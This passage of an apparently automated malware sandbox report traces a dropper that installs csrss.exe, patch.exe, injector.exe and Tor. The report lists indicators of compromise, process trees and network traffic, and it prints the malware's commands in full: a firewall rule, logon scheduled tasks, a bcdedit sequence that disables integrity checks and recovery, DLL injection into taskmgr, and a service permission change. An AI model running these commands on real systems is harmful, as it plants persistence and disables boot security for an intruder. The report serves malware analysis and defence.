Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2016	06260399.exe
1372	06260399.exe
1372	06260399.exe
1372	06260399.exe
1372	06260399.exe
1372	06260399.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1548	csrss.exe
1200	injector.exe
1200	injector.exe
1548	csrss.exe
1200	injector.exe
1200	injector.exe
1548	csrss.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe
1200	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	06260399.exe
Token: SeImpersonatePrivilege	2016	06260399.exe
Token: SeSystemEnvironmentPrivilege	1548	csrss.exe
Token: SeSecurityPrivilege	1396	sc.exe
Token: SeSecurityPrivilege	1396	sc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 976	1372	06260399.exe	32
PID 1372 wrote to memory of 976	1372	06260399.exe	32
PID 1372 wrote to memory of 976	1372	06260399.exe	32
PID 1372 wrote to memory of 976	1372	06260399.exe	32
PID 976 wrote to memory of 764	976	cmd.exe	34
PID 976 wrote to memory of 764	976	cmd.exe	34
PID 976 wrote to memory of 764	976	cmd.exe	34
PID 1372 wrote to memory of 1548	1372	06260399.exe	35
PID 1372 wrote to memory of 1548	1372	06260399.exe	35
PID 1372 wrote to memory of 1548	1372	06260399.exe	35
PID 1372 wrote to memory of 1548	1372	06260399.exe	35
PID 1548 wrote to memory of 1200	1548	csrss.exe	43
PID 1548 wrote to memory of 1200	1548	csrss.exe	43
PID 1548 wrote to memory of 1200	1548	csrss.exe	43
PID 1548 wrote to memory of 1200	1548	csrss.exe	43
PID 600 wrote to memory of 1388	600	patch.exe	46
PID 600 wrote to memory of 1388	600	patch.exe	46
PID 600 wrote to memory of 1388	600	patch.exe	46
PID 600 wrote to memory of 1752	600	patch.exe	48
PID 600 wrote to memory of 1752	600	patch.exe	48
PID 600 wrote to memory of 1752	600	patch.exe	48
PID 600 wrote to memory of 1020	600	patch.exe	50
PID 600 wrote to memory of 1020	600	patch.exe	50
PID 600 wrote to memory of 1020	600	patch.exe	50
PID 600 wrote to memory of 808	600	patch.exe	52
PID 600 wrote to memory of 808	600	patch.exe	52
PID 600 wrote to memory of 808	600	patch.exe	52
PID 600 wrote to memory of 1508	600	patch.exe	54
PID 600 wrote to memory of 1508	600	patch.exe	54
PID 600 wrote to memory of 1508	600	patch.exe	54
PID 600 wrote to memory of 1488	600	patch.exe	56
PID 600 wrote to memory of 1488	600	patch.exe	56
PID 600 wrote to memory of 1488	600	patch.exe	56
PID 600 wrote to memory of 1616	600	patch.exe	58
PID 600 wrote to memory of 1616	600	patch.exe	58
PID 600 wrote to memory of 1616	600	patch.exe	58
PID 600 wrote to memory of 1032	600	patch.exe	60
PID 600 wrote to memory of 1032	600	patch.exe	60
PID 600 wrote to memory of 1032	600	patch.exe	60
PID 600 wrote to memory of 1264	600	patch.exe	62
PID 600 wrote to memory of 1264	600	patch.exe	62
PID 600 wrote to memory of 1264	600	patch.exe	62
PID 600 wrote to memory of 1960	600	patch.exe	64
PID 600 wrote to memory of 1960	600	patch.exe	64
PID 600 wrote to memory of 1960	600	patch.exe	64
PID 600 wrote to memory of 1948	600	patch.exe	66
PID 600 wrote to memory of 1948	600	patch.exe	66
PID 600 wrote to memory of 1948	600	patch.exe	66
PID 600 wrote to memory of 1928	600	patch.exe	68
PID 600 wrote to memory of 1928	600	patch.exe	68
PID 600 wrote to memory of 1928	600	patch.exe	68
PID 600 wrote to memory of 1860	600	patch.exe	70
PID 600 wrote to memory of 1860	600	patch.exe	70
PID 600 wrote to memory of 1860	600	patch.exe	70
PID 1548 wrote to memory of 1004	1548	csrss.exe	72
PID 1548 wrote to memory of 1004	1548	csrss.exe	72
PID 1548 wrote to memory of 1004	1548	csrss.exe	72
PID 1548 wrote to memory of 1004	1548	csrss.exe	72
PID 1548 wrote to memory of 1484	1548	csrss.exe	74
PID 1548 wrote to memory of 1484	1548	csrss.exe	74
PID 1548 wrote to memory of 1484	1548	csrss.exe	74
PID 1548 wrote to memory of 1484	1548	csrss.exe	74
PID 1548 wrote to memory of 2024	1548	csrss.exe	80
PID 1548 wrote to memory of 2024	1548	csrss.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\06260399.exe
"C:\Users\Admin\AppData\Local\Temp\06260399.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
- C:\Users\Admin\AppData\Local\Temp\06260399.exe
  "C:\Users\Admin\AppData\Local\Temp\06260399.exe"
  2⤵
  - Windows security bypass
  - Loads dropped DLL
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Modifies data under HKEY_USERS
      PID:764
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Manipulates WinMon driver.
    - Manipulates WinMonFS driver.
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1344
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:1052
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:600
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1388
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1752
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1020
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:808
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1508
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1488
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1616
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1032
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1264
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1960
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1948
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1928
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1860
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1200
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      Executes dropped EXE
      PID:1484
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1752
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
      4⤵
      PID:2024
    - - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1396

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230601150011.log C:\Windows\Logs\CBS\CbsPersist_20230601150011.cab
1⤵
- Drops file in Windows directory
PID:1960

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1768

Network

DNS

bfd336f9-5fca-4b3c-b3eb-97a36d52a698.uuid.mastiakele.cyou

csrss.exe

Remote address:

8.8.8.8:53

Request

bfd336f9-5fca-4b3c-b3eb-97a36d52a698.uuid.mastiakele.cyou

IN TXT

Response
DNS

msdl.microsoft.com

patch.exe

Remote address:

8.8.8.8:53

Request

msdl.microsoft.com

IN A

Response

msdl.microsoft.com

IN CNAME

msdl.microsoft.akadns.net

msdl.microsoft.akadns.net

IN CNAME

msdl-microsoft-com.a-0016.a-msedge.net

msdl-microsoft-com.a-0016.a-msedge.net

IN CNAME

a-0016.a-msedge.net

a-0016.a-msedge.net

IN A

204.79.197.219
GET

https://msdl.microsoft.com/download/symbols/index2.txt

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 404 Not Found

X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: 1DFB3F1023DB40208853AEA71321F302 Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:30Z
Date: Thu, 01 Jun 2023 15:00:29 GMT
Content-Length: 0
GET

https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 302 Found

Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: EC87B0CDE47049D8AF1EF0596DFABBF7 Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:30Z
Date: Thu, 01 Jun 2023 15:00:29 GMT
Content-Length: 0
GET

https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 302 Found

Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: B4A3923263EE4DF8984AB3C40471AE9A Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:35Z
Date: Thu, 01 Jun 2023 15:00:34 GMT
Content-Length: 0
GET

https://msdl.microsoft.com/download/symbols/index2.txt

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 404 Not Found

X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: EF08A64D3F324BFBA29CAA00966BC3B6 Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:41Z
Date: Thu, 01 Jun 2023 15:00:41 GMT
Content-Length: 0
GET

https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 302 Found

Location: https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: 463DCC7FF2A3449BA678B1BF74DC1507 Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:42Z
Date: Thu, 01 Jun 2023 15:00:41 GMT
Content-Length: 0
GET

https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

patch.exe

Remote address:

204.79.197.219:443

Request

GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37C17C514C80692A05AB6EEF4D2A6816; _EDGE_V=1

Response

HTTP/1.1 302 Found

Location: https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: D3A55993272B4670AF5A2072105AC472 Ref B: AMS04EDGE1408 Ref C: 2023-06-01T15:00:43Z
Date: Thu, 01 Jun 2023 15:00:43 GMT
Content-Length: 0
DNS

vsblobprodscussu5shard30.blob.core.windows.net

patch.exe

Remote address:

8.8.8.8:53

Request

vsblobprodscussu5shard30.blob.core.windows.net

IN A

Response

vsblobprodscussu5shard30.blob.core.windows.net

IN CNAME

blob.sat12prdstr03a.store.core.windows.net

blob.sat12prdstr03a.store.core.windows.net

IN A

20.209.34.36
GET

https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3

patch.exe

Remote address:

20.209.34.36:443

Request

GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard30.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Content-Length: 8752128
Content-Type: application/octet-stream
Content-Language: x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2a33e1b7-201e-002a-2d99-947995000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 01 Jun 2023 15:00:31 GMT
GET

https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3

patch.exe

Remote address:

20.209.34.36:443

Request

GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard30.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Content-Length: 8752128
Content-Type: application/octet-stream
Content-Language: x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2a33f57c-201e-002a-5199-947995000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 01 Jun 2023 15:00:35 GMT
DNS

